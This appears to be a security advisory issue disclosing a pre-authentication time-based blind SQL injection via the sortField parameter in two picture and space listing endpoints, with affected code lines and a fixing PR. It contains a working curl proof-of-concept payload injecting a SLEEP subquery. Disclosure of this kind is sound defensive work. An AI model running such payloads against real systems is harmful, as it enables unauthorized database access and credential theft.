# [Security] SQL Injection via sortField parameter in multiple unauthenticated endpoints #4 ## Vulnerability Overview - **Vulnerability Type**: SQL Injection (Time-based Blind SQL Injection) - **Description**: The `sortField` parameter in `PageRequest` is passed directly to MyBatis-Plus's `orderBy()` method without any validation, leading to SQL injection in the ORDER BY clause. - **Affected Endpoints**: - `POST /api/picture/list/page/v0` - `POST /api/space/list/page/v0` - These endpoints are accessible without authentication. ## Impact Scope - **Affected Versions**: All versions (up to the latest master branch). - **Affected Code**: - `PictureServiceImpl.java` (Line 338) - `SpaceServiceImpl.java` (Line 622) - No authentication required - `UserServiceImpl.java` (Line 240) - Requires administrator role - **Impact**: - Exploitable without authentication (Pre-Auth). - Attackers can extract arbitrary data from the database (such as user credentials, administrator passwords, etc.) via time-based blind SQL injection. ## Remediation - **Fixing PR**: #3 ## POC Code ```bash curl -w "\nTime: %{time_total}s\n" -X POST http://TARGET:port/api/picture/list/page/v0 \ -H "Content-Type: application/json" \ -d '{"sortField":"(SELECT 1 FROM (SELECT SLEEP(3)) t)","sortOrder":"ascend","current":1,"pageSize":10}' ``` **Verification Instructions**: - Normal request (`sortField: "id"`) response time is approximately 0.02s. - Injected request response time is approximately 3.0s, confirming that `SLEEP` was executed.